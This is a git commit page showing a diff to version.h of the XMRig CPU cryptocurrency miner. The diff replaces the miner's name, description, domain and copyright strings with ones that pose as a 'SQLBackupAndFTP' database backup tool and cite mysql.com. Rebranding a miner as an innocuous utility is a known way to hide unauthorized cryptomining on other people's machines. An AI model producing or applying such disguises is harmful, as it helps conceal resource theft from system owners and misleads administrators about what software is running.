Update version.h
This commit is contained in:
parent
3cbbc94249
commit
e3ad4da13a
1 changed files with 6 additions and 6 deletions
|
@ -25,13 +25,13 @@
|
|||
#ifndef XMRIG_VERSION_H
|
||||
#define XMRIG_VERSION_H
|
||||
|
||||
#define APP_ID "xmrig"
|
||||
#define APP_NAME "XMRig"
|
||||
#define APP_DESC "XMRig CPU miner"
|
||||
#define APP_ID "SQLBackup"
|
||||
#define APP_NAME "SQLBackupAndFTP"
|
||||
#define APP_DESC "Database Backup Tool"
|
||||
#define APP_VERSION "3.1.3"
|
||||
#define APP_DOMAIN "xmrig.com"
|
||||
#define APP_SITE "www.xmrig.com"
|
||||
#define APP_COPYRIGHT "Copyright (C) 2016-2019 xmrig.com"
|
||||
#define APP_DOMAIN "mysql.com"
|
||||
#define APP_SITE "www.mysql.com"
|
||||
#define APP_COPYRIGHT "Copyright (C) 2011-2019 SQL"
|
||||
#define APP_KIND "cpu"
|
||||
|
||||
#define APP_VER_MAJOR 3
|
||||
|
|
Loading…
Add table
Add a link
Reference in a new issue